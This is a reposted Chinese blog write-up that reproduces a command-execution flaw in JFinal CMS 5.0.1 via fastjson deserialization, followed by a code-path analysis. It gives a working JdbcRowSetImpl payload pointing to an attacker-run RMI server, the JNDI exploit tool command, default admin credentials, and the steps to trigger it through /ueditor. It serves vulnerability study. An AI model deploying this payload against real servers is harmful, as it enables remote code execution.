返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >Jfinal CMS命令注入漏洞
  • 792
分享到

Jfinal CMS命令注入漏洞

java安全php 2023-09-05 13:09:55 792人浏览 独家记忆
摘要

漏洞环境 jfinal_cms 5.0.1 中存在命令执行漏洞 jdk 版本要求: 基于 RMI

漏洞环境

jfinal_cms 5.0.1 中存在命令执行漏洞

jdk 版本要求:

  • 基于 RMI<=6u141、7u131、8u121 使用的 JDK 版本
  • 基于 LDAP<=6u211、7u201、8u191 使用的 JDK 版本。

jfinal_cms版本:5.0.1
fastJSON版本:1.2.28

漏洞复用

测试中使用的JDK版本:JDK8u101

在 kali 上运行该工具,启动 rmi 和 ldap 服务
https://GitHub.com/feihong-cs/JNDIExploit

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe"

2022-11-17T12:30:22.png
替换payload中的rmi或ldap地址,然后保存到config.json

{    "a":{        "@type":"java.lang.Class",        "val":"com.sun.rowset.JdbcRowSetImpl"    },    "b":{        "@type":"com.sun.rowset.JdbcRowSetImpl",        "dataSourceName":"rmi://192.168.248.128:1099/6dxg2x",        "autoCommit":true    }}

登录后台,找到模板管理,后台默认账号密码admin/admin123456
2022-11-17T12:33:58.png
找到config.json并点击,之后点replace file
2022-11-17T12:35:10.png
把刚才做好的payload上传
2022-11-17T12:35:33.png
访问 /ueditor,就会执行命令并弹出计算器

Http://localhost:8080/jfinal_cms/ueditor

136699966-b0b2294c-cdf1-4145-9340-cc0885a7e73d.gif
利用成功,散会!

漏洞分析

com.jflyfox.component.controller.Ueditor
ActionEnter类在/ueditor路由的index方法中实例化
2022-11-17T12:38:14.png
com.baidu.ueditor.ActionEnter

ActionEnter类的构造方法中实例化
2022-11-17T12:39:52.png

com.baidu.ueditor.ConfigManager

ConfigManager调用的构造方法initEnv()
2022-11-17T12:40:25.png

com.baidu.ueditor.ConfigManager

initEnv调用JSONObject.parseObject来解析文件内容,这里的文件内容是可控的,只需将文件内容替换为payload即可
2022-11-17T12:41:17.png

com.baidu.ueditor.ConfigManager

如果后台存在任何文件上传漏洞,则可以将此文件替换为包含payload的文件,以触发 fastjson 反序列化WEB-INF/classes/config.json
2022-11-17T12:42:01.png
2022-11-17T12:42:09.png

来源地址:https://blog.csdn.net/MoLeft/article/details/128393531

--结束END--

本文标题: Jfinal CMS命令注入漏洞

本文链接: https://www.lsjlt.com/news/395368.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
  • Jfinal CMS命令注入漏洞
    漏洞环境 jfinal_cms 5.0.1 中存在命令执行漏洞 JDK 版本要求: 基于 RMI...
    99+
    2023-09-05
    java 安全 php
  • 【Web漏洞探索】命令注入漏洞
    【Web漏洞探索】命令注入漏洞 文章目录 【Web漏洞探索】命令注入漏洞一、什么是命令注入漏洞二、命令注入漏洞成因三、漏洞攻击利用手法命令执行函数命令执行连接符 四、过滤绕过绕过空格过...
    99+
    2023-09-07
    前端 安全 服务器
  • CVE-2020-15778 OpenSSH命令注入漏洞
    预备知识漏洞描述 OpenSSH8.3p1及之前版本中scp的scp.c文件存在操作系统命令注入漏洞。该漏洞即使在禁用ssh登录的情况下,但是允许使用scp传文件,而且远程服务器允许使用反引号(`)。攻击者可利用scp复制文件到远程服务器时...
    99+
    2023-10-02
    服务器 linux ssh
  • xml注入漏洞
    一、先认识XML XML有两个先驱——SGML(标准通用标记语言)和HTML(超文本标记语言),这两个语言都是非常成功的标记语言。SGML多用于科技文献和政府办公文件中,SGML非常复杂,其复杂程度对于网络上的日常使用简直不可思议。HTML...
    99+
    2023-09-02
    xml php 安全
  • 深入浅析ImageMagick命令执行漏洞
    00 前言 什么是ImageMagick? ImageMagick是一个功能强大的开源图形处理软件,可以用来读、写和处理超过90种的图片文件,包括流行的JPEG、GIF、 PNG、PDF以及PhotoCD等...
    99+
    2022-06-04
    漏洞 命令 ImageMagick
  • 命令执行漏洞 | iwebsec
    文章目录 1 靶场环境2 命令执行漏洞介绍3 靶场练习01-命令执行漏洞02-命令执行漏洞空格绕过03-命令执行漏洞关键命令绕过04-命令执行漏洞通配符绕过05-命令执行漏洞base64编码绕...
    99+
    2023-09-02
    php 安全 web安全
  • PbootCMS search SQL注入漏洞
    漏洞描述 i ⭐PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息 漏洞影响 s ✅PbootCMS < 1.2.1 空间测绘 d ⭕FOFA:app="PBO...
    99+
    2023-09-07
    php 安全 开发语言
  • Web漏洞-命令执行和代码执行漏洞
    命令执行原理 就是指用户通过浏览器或其他辅助程序提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。 漏洞成因 它所执行的命令会继承WebServer的权限,也就是说可以任意读取、修改、执行We...
    99+
    2023-08-31
    网络安全 web安全 Powered by 金山文档
  • 漏洞复现 || eGroupWare spellchecker.php 远程命令执行漏洞
    0x01 阅读须知 我爱林的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统...
    99+
    2023-09-07
    php 开发语言 漏洞复现 网络安全 安全
  • Nexus Repository Manager 2.x 命令注入漏洞 (CVE-2019-5475) 两次绕过
    作者: Badcode and Longofo@知道创宇404实验室 时间: 2020年2月9日原文链接:https://paper.seebug.org/1260/ 英文链接:https://paper.seebug.org/1...
    99+
    2023-06-04
  • sql注入漏洞怎么修
    可以通过以下方法修复 sql 注入漏洞:1. 参数化查询;2. 输入验证和清理;3. 使用安全 api;4. 限制数据库权限;5. 保持软件更新;6. 使用 web 应用程序防火墙 (w...
    99+
    2024-05-30
    数据访问
  • 【PHP代码注入】PHP代码注入漏洞
    漏洞原理 RCE为两种漏洞的缩写,分别为Remote Command/Code Execute,远程命令/代码执行 PHP代码注入也叫PHP代码执行(Code Execute)(Web方面),是指应用程序过滤不严,用户可以通过HTTP请...
    99+
    2023-09-01
    PHP代码注入漏洞 PHP代码执行漏洞 PHP常见的代码执行函数和语句 PHP代码执行漏洞利用 PHP代码执行漏洞防御 Powered by 金山文档
  • XAMPP远程命令执行漏洞
    漏洞描述: XAMPP v1.8.1 版本中存在安全漏洞,该漏洞源于程序没有正确限制对xampp/lang.php文件的访问。远程攻击者可通过‘WriteIntoLocalDisk’方法利用该漏洞修改xampp/lang.tmp文件,实施跨...
    99+
    2023-09-09
    php 安全 web安全
  • 命令执行漏洞及防御
    命令执行漏洞的原理 程序应用有时需要调用一些执行系统命令的函数,如php中的system,exec,shell exec,passthru,popen,proc popen等,当用户可以控制这些函数的参数时,就可以将恶意系统命令拼接到正常命...
    99+
    2023-09-02
    php 开发语言 网络安全 web安全
  • 漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
    漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞 漏洞描述 泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA...
    99+
    2023-08-21
    java sql 开发语言
  • PHPCMS各种注入漏洞补丁
    1、宽字节注入漏洞/phpcms/modules/pay/respond.php 位置约16行原来代码$payment = $this->get_by_code($_GET['code']);替换为$payment = $this->get...
    99+
    2016-04-12
    PHPCMS 注入 漏洞 补丁
  • 如何修复sql注入漏洞
    修复sql注入漏洞的方案:对所有查询语句,使用标准化的数据库查询语句API接口,设定语句的参数进行过滤一些非法的字符。对用户提交的参数进行安全过滤,像一些特殊的字符(,()*&……%#等等)进行字符转义操作网站的代码层编码统一使用utf8编...
    99+
    2024-04-02
  • sql注入漏洞在什么层
    sql注入可以分为平台层注入和代码层注入,平台层注入是由不安全的数据库配置或数据库平台的漏洞所导致出现,而代码层注入主要是由于程序员对用户输入数据未进行细致地过滤导致的。...
    99+
    2024-04-02
  • 如何修补sql注入漏洞
    修补sql注入漏洞的方法:对所有查询语句,使用标准化的数据库查询语句API接口,设定语句的参数进行过滤一些非法的字符。对用户提交的参数进行安全过滤,像一些特殊的字符(,()*&……%#等等)进行字符转义操作。网站的代码层编码统一使用...
    99+
    2024-04-02
  • 如何测试sql注入漏洞
    测试sql注入漏洞的方法:在登录页面的用户名输入框中,填上正常用户名admin,并且在用户名后增加一个单引号,单击"登录"或在URL地址栏直接输入登录后台,若出错证明没有对'进行过滤,存在SQL注入漏洞。...
    99+
    2024-04-02
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作